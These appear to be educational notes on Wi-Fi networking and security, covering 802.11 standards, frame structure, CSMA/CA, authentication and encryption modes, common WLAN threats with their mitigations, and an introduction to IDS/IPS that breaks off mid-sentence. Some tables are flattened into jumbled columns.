1.

WLAN (Wireless Local Area Network)

A WLAN is a type of local area network that uses radio waves to connect devices
to each other and to a larger network (like the Internet) without the need for
physical cables.
Radio Waves:
WLANs operate using radio waves, which are a form of electromagnetic radiation
that travels through the air. Radio waves are also used for many other
applications like broadcast radio, television, and mobile phone communication.
Main Components of a Wireless Network:
 Access Point (AP): An AP is a networking hardware device that allows
wireless-capable devices (clients) to connect to a wired network.
It acts as a central transmitter and receiver of wireless radio signals,
broadcasting the network name (SSID) and managing connections from
clients.
 Clients: These are the end-user devices equipped with wireless network
adapters that connect to the WLAN via an Access Point.
2. Wireless vs. Wired Local Networks - Comparison
Characteristic WLAN (IEEE 802.11 - Wi-Fi) Wired Ethernet LAN (IEEE 802.3)
Physical Layer Radio Frequency (RF) waves Physical cables
Media Access CSMA/CA (Collision Avoidance) CSMA/CD (Collision Detection) -
Control Listens before transmitting, tries to Detects collisions and retransmits
avoid collisions. (less relevant in modern switched
networks
Accessibility/ High - Devices can connect Low - Requires a physical cable
Mobility anywhere within AP range. connection to a network port
Signal Susceptible to interference from Minimal interference, as signals are
Interference other RF devices (microwaves, shielded within cables.
Bluetooth, other Wi-Fi), physical
obstructions, etc
Regulation Heavily regulated by country/region Primarily governed by IEEE
regarding frequency bands, power standards for cabling and signaling
levels, and channel usage
Authorized Frequency Bands & Notes (Examples, subject to specific national
regulations):
2.4 GHz Band:
 Channels: Typically 1-13 (varies slightly by country).
 Max Power: e.g., 100mW EIRP.
 Often crowded, prone to interference.
5 GHz Band:
 Channels: A wider range of channels available (e.g., 36-64, 100-140, etc.).
 Power: Variable, often depending on the channel; subject to DFS (Dynamic
Frequency Selection) and TPC (Transmit Power Control) requirements to
avoid interference with radar and other systems.
 Generally less crowded than 2.4 GHz, can offer higher speeds.
6 GHz Band (Wi-Fi 6E and newer):
 Authorized more recently (e.g., since 2021 in some regions).
  Offers even more channels and wider channel bandwidths, leading to
higher potential speeds and less interference.
 Subject to specific operational restrictions (e.g., Low Power Indoor (LPI)
use, Very Low Power (VLP) for portable outdoor devices).
3. 802.11 (Wi-Fi) Frame Structure
802.11 wireless frames have a specific structure to manage communication over
the air. Key components include a header, a data payload, and an error checking
field.
General Frame Structure:
[ MAC Header ] [ Frame Body (Payload/Useful Data) ] [ FCS (Frame Check
Sequence) ]
Key Fields in the 802.11 MAC Header:
Frame Control:
A 2-byte field containing various subfields that define:
 Protocol Version
 Frame Type (e.g., Management, Control, Data)
 Frame Subtype (e.g., Beacon, Probe Request, ACK, Data)
 To DS / From DS bits (indicating direction relative to the Distribution
System/wired network)
 More Fragments, Retry, Power Management, More Data, Protected Frame
(WEP/WPA), Order bits.
Duration/ID:
 A 2-byte field used to set the Network Allocation Vector (NAV) for collision
avoidance, indicating how long the medium will be busy. Can also carry an
Association ID (AID) in some frames.
Address Fields (each is a 6-byte MAC address):
 Address 1 (Receiver Address):
 Address 2 (Transmitter Address):.
 Address 3 (Destination Address/Source Address/BSSID): Meaning varies
based on To/From DS bits:
 Can be the original source MAC (if From DS=1, To DS=0).
 Can be the final destination MAC (if From DS=0, To DS=1).
 Can be the BSSID (AP's MAC address) in other cases.
 Address 4 (Optional): Used in specific modes like Wireless Distribution
System (WDS) links between APs or in mesh networks. Generally not
present in typical client-to-AP communication.
Sequence Control:
 A 2-byte field used for tracking fragmented frames and identifying
duplicate frames. Contains a Fragment Number and a Sequence Number.
Frame Body (Useful Data / Payload):
 Contains the actual data being transmitted (an IP packet, LLC data).
Variable length.
FCS (Frame Check Sequence):
  A 4-byte field containing a CRC value calculated over the MAC header and
Frame Body.
 Used by the receiver to detect errors that may have occurred during
transmission. If the calculated FCS doesn't match the received FCS, the
frame is considered corrupt and discarded.

4. CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance)

CSMA/CA is the media access control method used in IEEE 802.11 (Wi-Fi)
networks to manage how devices share the wireless medium and to minimize
(avoid) data collisions.
Wireless is a shared medium and typically operates in half-duplex mode, unlike
wired Ethernet, wireless devices cannot reliably detect collisions as they happen
because their own transmission usually drowns out other signals. Therefore, Wi-
Fi uses Collision Avoidance rather than Collision Detection.
Core Mechanisms of CSMA/CA:
a) Listen Before Talk (LBT) - Carrier Sense:
Before transmitting, a station listens to the wireless channel to check if it is idle,
this is known as physical carrier sense.
It also uses a virtual carrier sense mechanism called the Network Allocation
Vector (NAV), which is a timer that indicates how long the medium is expected to
be busy based on overheard frame durations.
b) Random Backoff Timer:
If the medium is busy, or after a successful transmission, stations wait for a
random period (a backoff timer) before attempting to transmit again. This helps
to reduce the probability of multiple stations trying to transmit at the exact same
moment the medium becomes free.
c) Interframe Spacing (IFS):
Defined short time intervals between frames to help coordinate access (SIFS,
DIFS, EIFS).
d) Optional RTS/CTS Exchange (Request to Send / Clear to Send):
For larger data frames, or in busy environments, an RTS/CTS exchange can be
used to reserve the medium:
RTS (Request To Send): The sending station transmits a short RTS frame to the
intended recipient (e.g., Access Point).
CTS (Clear To Send): If the recipient receives the RTS and is ready, it responds
with a short CTS frame.
The RTS and CTS frames contain duration information that updates the NAV for
all other nearby stations, telling them to remain silent for the duration of the
upcoming data transmission and its acknowledgment. This helps to mitigate the
"hidden node problem."
If the sender doesn't receive a CTS, it assumes the medium isn’t available and
will back off.
e) Data Transmission:
Once the medium is clear (or CTS is received), the station transmits its data
frame.
f) Acknowledgments (ACKs):
For most data frames, the receiving station, upon successful reception (FCS
check passes), sends back a short ACK frame to the sender.
If the sender does not receive an ACK within a certain timeframe, it assumes the
data frame was lost and will typically retransmit the frame after a backoff period.
 5. Association Between Wireless Client and Access Point (AP)
For a wireless device to communicate on a wireless network, it must first
establish a connection with an Access Point (AP) or a wireless router. This
process typically involves three main stages:
a) Discovery (Scanning):
The wireless client needs to find available wireless networks. This is done
through scanning:
 Passive Scanning: The client listens for "Beacon" frames regularly
broadcast by APs. Beacon frames announce the AP's presence and
network parameters (like the SSID).
 Active Scanning: The client broadcasts "Probe Request" frames to discover
APs. APs within range that receive the probe request will respond with
"Probe Response" frames.
The client identifies potential APs to connect to based on their SSIDs and signal
strength.
b) Authentication:
Before a client can associate, it must authenticate with the AP. This is a security
step to verify the client's legitimacy (and sometimes the AP's legitimacy to the
client).
The type of authentication depends on the security method configured:
Open System Authentication: Essentially no authentication; the client requests,
and the AP typically accepts. Used in open (unsecured) networks or as a
preliminary step before higher-level authentication (like 802.1X).
Shared Key Authentication (Legacy - WEP): A deprecated and insecure method
where both client and AP use a pre-shared WEP key for a challenge-response
authentication.
802.1X/EAP Authentication (WPA/WPA2/WPA3 Enterprise): A robust
authentication framework involving an authentication server (e.g., RADIUS). The
client authenticates with the server via the AP.
PSK Authentication (WPA/WPA2/WPA3 Personal): The client and AP use a Pre-
Shared Key (passphrase) to authenticate each other.
c) Association:
Once authentication is successful (or if it's an open network), the client sends an
"Association Request" frame to the AP.
If the AP accepts the request, it responds with an "Association Response" frame,
and the client is then considered associated with the AP.
At this point, the client is part of the Basic Service Set (BSS) managed by that AP
and can begin sending and receiving data frames through it.
 6. Association Between Wireless Client and AP - Key Parameters for
Agreement
For a successful wireless association, both the client device and the Access Point
must agree on and support a common set of configuration parameters:
SSID (Service Set Identifier): The name of the wireless network. Clients see this
name when scanning for available networks (unless the SSID broadcast is
disabled).
In larger networks, multiple APs can use the same SSID to form an Extended
Service Set (ESS), allowing clients to roam. SSIDs are often mapped to specific
VLANs in enterprise environments for network segmentation.
Password: A secret key or phrase required for the client to authenticate with the
AP.
Primarily used in WPA/WPA2/WPA3 Personal (Pre-Shared Key - PSK) security
modes.
Network Mode (802.11 Standards): Refers to the specific IEEE 802.11 wireless
standards supported (e.g., 802.11a, 802.11b, 802.11g, 802.11n, 802.11ac,
802.11ax - Wi-Fi 6/6E, 802.11be - Wi-Fi 7).
APs often operate in a "mixed mode" to allow clients with different capabilities to
connect (e.g., an AP supporting 802.11n/ac/ax can allow older 802.11n clients
and newer 802.11ax clients to connect). Both client and AP must support a
common standard.
Security Mode: The type of security protocol used to protect the wireless
communication. Examples include:
 WEP (Wired Equivalent Privacy): Deprecated and highly insecure. Do not
use.
 WPA (Wi-Fi Protected Access): An interim improvement over WEP. Also
largely superseded.
 WPA2 (Wi-Fi Protected Access II): Was the standard for many years,
offering strong security (using AES encryption).
 WPA3 (Wi-Fi Protected Access III): The latest standard, offering enhanced
security features over WPA2.
Both the client and AP must be configured to use the same (or compatible)
security mode and encryption methods. It's recommended to use the highest
level of security supported by both devices (ideally WPA3).
Channel Parameters:
The specific radio frequency channel within a frequency band (e.g., 2.4 GHz, 5
GHz, or 6 GHz) that the AP uses for communication.
The client must tune its radio to the same channel as the AP to communicate.
APs can often automatically select the best channel to minimize interference, or
channels can be configured manually.
 Typical Max
Frequencies Indoor Outdoor Wi-Fi
Standard Year Throughp PHY
(GHz) Range Range Generation
ut Rate

2
802.11 1997 2.4 1 Mbps 20 m 100 m -
Mbps

54
802.11a 1999 5 25 Mbps 35 m 120 m -
Mbps

11
802.11b 1999 2.4 6.5 Mbps 35 m 140 m Wi-Fi 1
Mbps

54
802.11g 2003 2.4 25 Mbps 38 m 140 m Wi-Fi 3
Mbps

70 m (2.4
150–300+ 600 GHz)
802.11n 2009 2.4 / 5 250 m Wi-Fi 4
Mbps Mbps 35 m (5
GHz)

Up to
433–867+
802.11ac 2013 5 6.9 35 m 300 m Wi-Fi 5
Mbps
Gbps

Up to
Varies
802.11ax 2019 / 2021 2.4 / 5 / 6 (6E) 9.6 35 m 300 m Wi-Fi 6 / 6E
widely
Gbps

Up to
Varies
802.11be 2024 2.4 / 5 / 6 46 30 m 120 m Wi-Fi 7
widely
Gbps

Important Considerations:
Data Rates: "Typical" rates are averages and actual throughput is often much
lower than "Max" rates due to overhead, interference, distance, and other
factors. Max rates often assume multiple spatial streams and wide channels.
Range: Theoretical ranges are optimistic and heavily influenced by the
environment, interference, antenna design, and transmit power. Lower
frequencies (like 2.4 GHz) generally offer better range and penetration than
higher frequencies (5 GHz, 6 GHz), but higher frequencies offer more bandwidth
and potentially higher speeds.
Backward Compatibility: Newer standards are generally backward compatible
with older standards operating in the same frequency band (e.g., an 802.11ax AP
can support 802.11n/ac/g/b clients in the 2.4 GHz band).
Wi-Fi Alliance Names: The Wi-Fi Alliance introduced simpler generational names
(Wi-Fi 4, 5, 6, 6E, 7) to make it easier for consumers to identify technology
levels.
Channel Information:
2.4 GHz band:
 uses channels 1–14 (availability depends on region)
 In the U.S. and many other countries only channels 1–11 are permitted.
 Channel 14 is allowed only in Japan and only for 802.11b.
5 GHz Band:
 uses Channels 36–64 and 100–140 (transmit power and DFS requirements
vary by channel and country)

7. Wi-Fi Discovery Modes: Passive and Active Scanning

Wireless clients use two primary methods to discover available Wi-Fi networks
(APs):
a) Passive Scanning (Discovery by Beacons):
Access Points (APs) periodically broadcast Beacon frames.
Beacon frames contain information about the AP and its network, including:
 SSID (Network Name)
 Supported Wi-Fi standards (e.g., 802.11ax / Wi-Fi 6)
 Security parameters (e.g., WPA3, WPA2)
 Channel information, data rates, etc.
Wireless clients listen passively on different channels for these beacon frames to
build a list of available networks.
Advantages:
 Simple and automatic for the client.
 Relatively low power consumption for the client.
 Allows clients to discover all networks that are actively broadcasting their
beacons.
b) Active Scanning (Discovery by Probes):
The wireless client actively transmits Probe Request frames to search for
networks.
Two main types of Probe Requests:
Directed Probe Request (With known SSID): The client sends a probe request
specifying a particular SSID it is looking for. Only APs configured with that exact
SSID will respond with a Probe Response frame.
Broadcast Probe Request (General discovery / Without SSID): The client sends a
probe request with a null or wildcard SSID. All APs in range that are configured to
respond to such requests will send back a Probe Response frame, advertising
their network(s).
Use Cases for Active Scanning:
 To discover networks where the SSID broadcast has been disabled
 To potentially speed up the connection process to a known network by
directly probing for it.
 Probe Response Frames: Similar to Beacons, Probe Responses contain
information about the AP and its network
 8. Common Threats to WLAN (Wireless Local Area Network)
The broadcast nature of wireless signals makes WLANs inherently more
susceptible to certain types of attacks compared to wired networks. Anyone
within signal range can potentially attempt to interact with the network using
various attacks, including:
Data Interception (Eavesdropping):
 If wireless traffic is not encrypted (or uses weak encryption), attackers
within range can capture and read sensitive information transmitted over
the air using readily available tools (e.g., packet sniffers).
Unauthorized Access (Intruders):
 Weak or non-existent authentication mechanisms (e.g., open networks,
easily guessable pre-shared keys/passphrases, no 802.1X authentication)
can allow unauthorized users or devices to connect to the WLAN and gain
access to network resources.
Denial of Service (DoS) Attacks:
 Attackers can disrupt the availability of the wireless network for legitimate
users. This can be achieved through various means:
RF Jamming:
 Transmitting strong radio signals to interfere with legitimate Wi-Fi
communication.
Flooding Attacks:
 Overwhelming the Access Point (AP) or clients with excessive traffic or
connection requests (e.g., association/authentication floods,
deauthentication/disassociation attacks).
Rogue Access Points (Rogue APs):
 An unauthorized AP connected to the organization's wired network, often
installed by an employee without IT knowledge/approval or maliciously by
an attacker.
 Rogue APs can bypass existing network security controls, create
unsecured entry points into the network, and potentially allow attackers to
intercept traffic or launch further attacks.
Evil Twin Attacks:
 An attacker sets up a fraudulent AP with the same SSID (and sometimes
similar security settings) as a legitimate AP.
 Unsuspecting users might connect to the evil twin, allowing the attacker to
intercept their traffic, steal credentials (e.g., via a fake captive portal), or
launch man-in-the-middle attacks.
Misconfigured APs:
 APs configured with weak security settings (e.g., default passwords,
disabled encryption, outdated firmware) create significant vulnerabilities.
War Driving/Walking/Chalking:
  The act of searching for Wi-Fi networks, often from a moving vehicle (war
driving) or on foot, to identify their existence, signal strength, and security
settings. War chalking involves marking locations of open or poorly
secured networks.
9. Wi-Fi Denial of Service (DoS) Attacks and Disruptions
Denial of Service (DoS) in a Wi-Fi context refers to any action that prevents
legitimate users from accessing or using the wireless network.
Common Causes of Wi-Fi DoS:
Misconfigured Devices:
 Incorrect settings on Access Points or client devices (accidental or
malicious) can lead to network outages or prevent connections.
(Examples: Channel conflicts, incorrect IP configurations, improper
security settings.)
Intentional Hacking (Malicious DoS Attacks):
 RF Jamming: An attacker transmits strong radio signals on Wi-Fi
frequencies to overwhelm legitimate signals and disrupt communication.
Protocol-Based Attacks:
 Deauthentication/Disassociation Floods: Sending spoofed management
frames to disconnect clients from the AP.
 Association/Authentication Floods: Overwhelming the AP with connection
requests.
 CTS/RTS Floods: Manipulating CSMA/CA mechanisms to reserve the
medium and prevent others from transmitting.
Accidental Interference:
Non-Wi-Fi devices operating in the same radio frequency bands can interfere
with Wi-Fi signals, degrading performance or causing connection drops. Common
sources include:
 Microwave ovens (especially in the 2.4 GHz band)
 Cordless phones (older 2.4 GHz models)
 Bluetooth devices
 Other wireless technologies.
The 2.4 GHz band is particularly prone to interference due to its widespread use
and fewer non-overlapping channels. The 5 GHz (and 6 GHz) bands are generally
less susceptible.
Solutions and Mitigation Strategies:
Secure Configurations:
 Use strong, unique administrative passwords for APs and network devices.
 Regularly back up configurations.
 Keep firmware and software on APs, routers, and client devices up to date
with the latest security patches.
 Implement robust authentication and encryption (e.g., WPA3).
Network Monitoring:
 Actively monitor the wireless network for unusual activity, high error rates,
or signs of interference.
 Use Wi-Fi analysis tools to identify and locate sources of interference or
malicious activity quickly.
 Intrusion Detection/Prevention Systems (IDS/IPS) with wireless capabilities
can help detect and sometimes mitigate DoS attacks.
Utilize Less Congested Frequency Bands:
 Whenever possible, favor the 5 GHz and 6 GHz (Wi-Fi 6E) bands over the
2.4 GHz band. These bands offer more channels and are generally less
crowded and less prone to interference from common household devices.
Physical Security:
 Control physical access to APs to prevent tampering or unauthorized
connections.
Channel Management:
 Conduct site surveys to plan channel allocation effectively and minimize
co-channel and adjacent-channel interference.
 10.802.11 Authentication Methods
Wireless networks use authentication methods to verify the identity of devices
attempting to connect. Early and basic approaches include:
a) Open System Authentication (Open Network):
No Password Required: Clients do not need to provide any credentials (like a
password) to authenticate.
Any Client Can Associate: Essentially, any device that requests to connect will be
allowed to authenticate and then associate.
Common Use: Often used for providing free, public Wi-Fi access (e.g., in cafes,
airports), though often in conjunction with a captive portal for terms acceptance
or secondary login.
Security Implication: Offers no confidentiality for the connection itself (unless
higher-layer encryption like HTTPS is used). The client bears full responsibility for
securing their own communications. Data transmitted over an open Wi-Fi
network without further encryption is vulnerable to eavesdropping.
b) Shared Key Based Authentication:
This category broadly refers to methods where access is controlled by a key or
passphrase known to both the Access Point and the client, such as WEP, WPA,
WPA2, and WPA3, which primarily refers to their "Personal" or "PSK (Pre-Shared
Key)" modes.
WEP (Wired Equivalent Privacy): An early and now deprecated/insecure method
using a static shared key.
WPA/WPA2/WPA3 (Personal/PSK modes): Use a pre-shared key (passphrase) that
is configured on both the AP and clients. These are significantly more secure
than WEP.
Note: Enterprise versions of WPA/WPA2/WPA3 use 802.1X/EAP, which is a more
robust, individual credential-based authentication method rather than a single
shared key for all users)
 11.Authentication Methods Using a Shared Key (Personal/PSK Modes)
These methods use a pre-shared key or passphrase known to both the AP and
clients.
WEP (Wired Equivalent Privacy):
 The original security protocol for 802.11. Used the RC4 stream cipher with
a static, often short, shared key.
 Security Status: DEPRECATED and SEVERELY INSECURE. Contains
fundamental cryptographic flaws that allow the key to be easily recovered
and traffic decrypted. Should NEVER be used.
WPA (Wi-Fi Protected Access):
 An interim security standard developed by the Wi-Fi Alliance to address
WEP's weaknesses while using hardware that might not have fully
supported WPA2 at the time.
 Encryption: Primarily used TKIP (Temporal Key Integrity Protocol), which
dynamically changed keys for each packet and included a Message
Integrity Check (MIC) called Michael. TKIP was designed as a wrapper
around RC4 to improve its security.
 Security Status: DEPRECATED and INSECURE. While an improvement over
WEP, TKIP also has known vulnerabilities.
WPA2 (Wi-Fi Protected Access II):
 A robust security standard that became the industry norm for many years.
 Encryption: Mandates the use of AES (Advanced Encryption Standard) with
CCMP (Counter Mode Cipher Block Chaining Message Authentication Code
Protocol). AES-CCMP provides strong encryption and integrity.
Modes:
 WPA2-Personal (WPA2-PSK): Uses a pre-shared key (passphrase).
 WPA2-Enterprise: Uses 802.1X/EAP for individual user authentication with
a RADIUS server.
 Security Status: Generally considered secure, especially WPA2-Enterprise.
WPA2-Personal is vulnerable to offline dictionary attacks if a weak
passphrase is used.
WPA3 (Wi-Fi Protected Access III):
 The latest generation of Wi-Fi security, offering significant improvements
over WPA2.
 Stronger Protection against Password Guessing (WPA3-Personal): Replaces
PSK with SAE (Simultaneous Authentication of Equals), which is more
resilient to offline dictionary attacks even with simpler passphrases.
 Enhanced Encryption (WPA3-Enterprise): Offers an optional 192-bit
security suite (CNSA suite) for higher security requirements, while still
supporting AES-CCMP (128-bit).
 Protected Management Frames (PMF): Mandates the use of PMF (802.11w)
to protect certain types of management frames (like
deauthentication/disassociation frames) from spoofing, enhancing network
resilience.
 Easier IoT Onboarding (Wi-Fi Easy Connect™): Simplifies connecting
devices without robust display interfaces.
  Improved Open Network Security (Wi-Fi Enhanced Open™): Provides
opportunistic encryption (OWE - Opportunistic Wireless Encryption) for
open networks, encrypting traffic even without authentication.
 Security Status: The current recommended standard for Wi-Fi security.
12.Home Wi-Fi Authentication Modes (Typically under WPA2/WPA3)
When configuring Wi-Fi security, especially on home routers, you'll often
encounter two main modes: Personal (PSK) and Enterprise (802.1X).
a) "Personal" Mode (PSK - Pre-Shared Key):
Primarily designed for home users and small offices/businesses.
How it Works:
 A single password is configured on the Access Point (AP)/router.
 All clients wishing to connect to the Wi-Fi network must use this same
shared password.
Advantages:
 Simple to configure and manage: No external authentication server is
required.
Disadvantages:
 If the password is compromised, all devices using it are at risk.
 Revoking access for a specific device means changing the password for
everyone.
 Vulnerable to offline dictionary attacks if a weak passphrase is used
(especially with WPA2-PSK; WPA3-Personal/SAE is more resilient).

b) "Enterprise" Mode (RADIUS / 802.1X / EAP):

Designed for businesses, organizations, and larger networks requiring more
robust security and centralized management.
How it Works:
 Each user (or device) authenticates with unique credentials (e.g.,
username and password, digital certificate).
 These credentials are verified by a central authentication server, typically
a RADIUS (Remote Authentication Dial-In User Service) server. The AP acts
as an authenticator, passing credentials between the client and the
RADIUS server.
Advantages:
 Enhanced Security: Individual credentials mean access can be granted or
revoked on a per-user basis. Stronger authentication methods can be
used.
 Centralized Management: User accounts and access policies are managed
on the RADIUS server.
 Scalability: Better suited for larger numbers of users and devices.
Disadvantages:
 More Complex to Set Up: Requires a dedicated RADIUS server and more
involved configuration on both the APs and potentially client devices.
  Common Example: Used in corporate environments, universities, and
other organizations.
(Note: the same Personal/Enterprise distinction discussed here applies to WPA
and WPA3 as well).
 13.Wi-Fi Encryption Methods (Protocols used with WPA/WPA2)
Encryption is crucial for protecting the confidentiality and integrity of data
transmitted over wireless networks.
a. TKIP (Temporal Key Integrity Protocol):
Primarily used with WPA (Wi-Fi Protected Access).
TKIP was designed as an interim solution to improve upon the severe
weaknesses of WEP without requiring immediate hardware replacement (it could
often run on WEP-capable hardware).
Mechanism:
It still used the RC4 stream cipher (like WEP) at its core. However, it introduced
significant enhancements:
 Per-Packet Key Mixing: Generates a unique encryption key for each data
packet, making it much harder to crack than WEP's static key.
 Message Integrity Check (MIC): Implemented a MIC called "Michael" to
protect against data tampering.
 Sequence Counter: Helped prevent replay attacks.
 Security Status: While an improvement over WEP, TKIP also has known
vulnerabilities and is now considered deprecated and insecure. It should
not be used if stronger options like AES-CCMP are available.

b. AES-CCMP (Advanced Encryption Standard with Counter Mode CBC-MAC

Protocol):
The mandatory encryption method for WPA2 and also a primary option for WPA3.
Used to provide strong encryption and data integrity for wireless
communications.
Mechanism:
 Uses the AES (Advanced Encryption Standard) block cipher, which is a
highly secure and widely adopted encryption algorithm.
 Operates in CCMP (Counter Mode with CBC-MAC Protocol) mode. CCMP
combines AES for encryption (confidentiality) with mechanisms for
ensuring message authenticity and integrity.
 Security Status: Strong and currently considered secure. AES-CCMP is the
preferred method for Wi-Fi encryption when WPA2 or WPA3 is used.
Configuration Example:
 When configuring Wi-Fi security, an administrator would typically choose
WPA2 or WPA3 and select AES (which implies CCMP) as the encryption
method for the strongest protection. For example, selecting "WPA2
Personal" with "AES" encryption.
 14.Enterprise Wi-Fi Authentication (WPA/WPA2/WPA3-Enterprise)
Enterprise security mode for Wi-Fi provides robust, centralized authentication
suitable for businesses and organizations. It relies on the AAA (Authentication,
Authorization, and Accounting) framework, typically implemented using a
RADIUS (Remote Authentication Dial-In User Service) server.
Key Components and Concepts:
RADIUS Server:
A central server that handles user authentication requests, makes authorization
decisions, and collects accounting information.
AAA Framework:
 Authentication: Verifies the identity of users attempting to connect to the
network (e.g., using usernames/passwords, digital certificates via EAP
methods).
 Authorization: Determines the level of access and network resources an
authenticated user is permitted to use (e.g., VLAN assignment, access to
specific services).
 Accounting: Tracks user activity, such as connection times, data usage,
and session details, for auditing and billing purposes.
Access Point as RADIUS Client:
The AP acts as an intermediary (RADIUS client or authenticator). It forwards
authentication requests from wireless clients to the RADIUS server and enforces
the decisions made by the server.
Configuration Parameters (on the AP for connecting to the RADIUS server):
RADIUS Server IP Address:
 The IP address of the RADIUS server the AP will communicate with.
RADIUS Port Numbers (UDP):
 Authentication Port: Officially UDP port 1812 (legacy UDP port 1645).
 Accounting Port: Officially UDP port 1813 (legacy UDP port 1646).
 The AP and RADIUS server must be configured to use the same ports.
Shared Secret (Shared Key):
 A secret key configured on both the AP and the RADIUS server.
 This key is used to authenticate the AP to the RADIUS server and to
encrypt communication between them. It is not the password used by end-
users to log in to the Wi-Fi.
 Process: When a user tries to connect to a WPA/WPA2/WPA3-Enterprise
network, the AP facilitates an EAP (Extensible Authentication Protocol)
exchange between the client device and the RADIUS server to
authenticate the user.
 15.IT Security: WLAN Security - Importance and Goals
Unlike wired networks where data is physically contained within cables (as
electrical or light signals), Wireless Local Area Networks (WLANs) transmit data
using radio waves.
These radio waves propagate through the air and can potentially be intercepted
by anyone within the signal range of an Access Point (AP) using appropriate
equipment.
This inherent broadcast nature makes WLANs more susceptible to eavesdropping
and unauthorized access if not properly secured.
Critical Need for WLAN Security:
Due to these vulnerabilities, implementing robust security measures for WLANs
is critically important to protect data and network resources.
Security Services Provided by 802.11 Standards (and amendments like
WPA/WPA2/WPA3):
The IEEE 802.11 Wi-Fi standards, along with their security enhancements, aim to
provide a layer of security for wireless data by addressing the following core
principles:
Authentication:
 Verifying the identity of users and devices attempting to connect to the
wireless network.
 Ensuring that only authorized entities can gain access.
Confidentiality (Encryption):
 Protecting the secrecy of data transmitted over the air by encrypting it.
 Making the data unreadable to unauthorized parties who might intercept
it.
Integrity:
 Ensuring that data transmitted over the wireless network has not been
altered or tampered with during transit.
 Mechanisms (like Message Integrity Checks - MICs) are used to detect any
modifications.
 16.WLAN Security: Authentication
Clients must authenticate with an Access Point (AP) to gain network access.
Often, this involves a static password stored on the client device.
Vulnerabilities of Simple Password-Based Authentication:
 Compromised Credentials/Device: If a device with the stored password is
stolen or lost, or if the password itself is compromised, unauthorized
access can occur.
 Connection to Rogue APs (Evil Twins): Clients might unknowingly connect
to a malicious AP masquerading as a legitimate one, especially if only the
client authenticates to the AP.
Solution: Mutual Authentication
To enhance security, authentication should be bidirectional (mutual):
 The client authenticates to the AP.
 The AP also authenticates itself to the client.
 This helps prevent clients from connecting to illegitimate APs. This is a
core feature of WPA2/WPA3-Enterprise (using certificates) and WPA3-
Personal (using SAE).

17.WLAN Security: Confidentiality (Encryption)

To protect data transmitted over a wireless network from eavesdropping, it must
be encrypted by the sender and decrypted by the intended recipient.
Key Management for Confidentiality:
Pairwise/Unicast Keys:
 The Access Point (AP) negotiates a unique encryption key with each
individual client associated with it.
 This key (e.g., Pairwise Transient Key - PTK in WPA2/WPA3) is used to
encrypt data transmitted directly between the AP and that specific client
(unicast traffic).
 This ensures that communication between the AP and one client cannot be
easily decrypted by other clients on the same network.
Group Keys:
 The AP generates and distributes a group encryption key (e.g., Group
Temporal Key - GTK in WPA2/WPA3) to all clients currently associated with
it.
 This group key is used to encrypt broadcast and multicast traffic (e.g., ARP
requests, some types of service discovery) that needs to be sent from the
AP to all connected clients simultaneously.
 a client sending data encrypted with its unique pairwise key to the AP,
making it unreadable to other clients in the vicinity.
 18.WLAN Security: Integrity (Message Integrity Check - MIC)
Message Integrity Check (MIC) is a security mechanism used in WLANs to protect
against data falsification or tampering. It ensures that the data received is the
same as the data sent and has not been altered in transit.
Process:
Sender Side:
 Before transmission, a MIC value is calculated over the plaintext message
(or relevant parts of the frame, including some header information). This
MIC is like a cryptographic checksum.
 The original message and its MIC are then typically protected (e.g., the
message is encrypted, and the MIC might be encrypted with it or
appended to the encrypted payload, depending on the protocol like
CCMP).
 The protected message (including or associated with the MIC) is sent to
the recipient.
Recipient Side:
 The recipient receives the protected message.
 The recipient decrypts the message payload (if encrypted).
 The recipient independently recalculates the MIC on the received
(decrypted) message data using the same algorithm and key as the
sender.
 The recipient then compares the MIC it just recalculated with the MIC that
was received from the sender.
Verification Outcome:
 If the two MIC values MATCH: This provides strong assurance that the data
has not been altered during transmission. Integrity is maintained.
 If the two MIC values DO NOT MATCH: This indicates that the data has
been tampered with or corrupted in transit, and the packet is typically
discarded.
Protocols:
 Mechanisms like CCMP (used in WPA2/WPA3) incorporate strong MIC
capabilities as part of their operation, providing both confidentiality
(through AES encryption) and integrity/authenticity. TKIP (used in WPA)
also had a MIC (called "Michael"), but it was weaker.
 19.IT Security: Intrusion Detection and Prevention Systems (IDS/IPS)
IDS (Intrusion Detection System)
What is an IDS?
 An IDS is a security system (software or hardware) that monitors network
traffic or system activities for malicious actions or policy violations. Its
primary role is to detect potential intrusions and alert administrators. It is
a passive system.
The interest/benefit of using an IDS? Why deploy an IDS? What are its
advantages?
 To gain visibility into network/system security events and detect attacks
that might bypass other defenses (like firewalls).
 Real-time monitor - Reduces risks of bring compromised - Early attack
detection (potentially before damage) - complements other security tools
(defense-in-depth) - aids in regulatory compliance (e.g., ISO 27001) -
provides logs for incident analysis and forensics.
The types of IDS?
Common types (deployment of ids) include:
 NIDS (Network-based IDS): Monitors traffic on the network.
 HIDS (Host-based IDS): Monitors activities on individual hosts/endpoints.
 WIDS (Wireless IDS): Monitors wireless networks from unauthorized access
 NBA (Network Behavior Analysis systems): Focuses on detecting abnormal
traffic patterns rather than specific packet content. Uses behavioral
baselines. sometimes considered a subtype
 Hybrid IDS: often combine these methods
Common types (Detection Methods) include:
 Signature-based IDS: Detects known attack patterns (signatures).
 Anomaly-based IDS: Detects deviations from normal behavior baselines.
 Heuristic-based detection: Uses rules or AI-like logic to assess behavior (a
mix of signature + anomaly). More flexible but harder to fine-tune.
 Policy-based detection: Triggers alerts based on violations of pre-defined
security policies (e.g., “no FTP access after hours”). Very specific and
controlled.
Architecture of an IDS? Main components (capture, analysis, alerts)
 Sensors/Capture Agents: Collect data (network packets for NIDS, system
logs/events for HIDS).
 Analysis Engine: Processes the collected data, applying detection rules or
algorithms.
 Alerting/Reporting System: Notifies administrators of detected incidents
and logs events.
 (Management Console): Often a central interface for configuration and
viewing alerts.
Operating mode of an IDS
Operates passively ("out-of-band"). It monitors a copy of the traffic or system
logs without being directly in the data path. It detects and alerts but doesn't
block traffic itself.
How does an IDS work?
It collects data (network traffic or host logs), analyzes this data against known
attack signatures or established baselines of normal behavior, and if a match or
significant deviation is found, it triggers an alert.
Exemples de solutions IDS (Examples of IDS solutions.)
 Open Source: Snort, Suricata, OSSEC (HIDS).
 Commercial: Many vendors offer IDS capabilities as standalone products or
integrated into broader security platforms (e.g., within NGFWs, SIEM
solutions).

IPS (Intrusion Prevention System):

What is an IPS?
 An IPS is a security system that monitors network/system activities for
malicious actions and, unlike an IDS, can actively block or prevent
detected intrusions in real-time. It is an active, inline system.
The interest/benefit of using an IPS? Why deploy an IPS? What are its
advantages?
 Interest/Why Deploy: To automatically stop known attacks before they can
impact systems, reducing the window of exposure and reliance on manual
intervention.
 Advantages: Real-time threat prevention, reduces workload on security
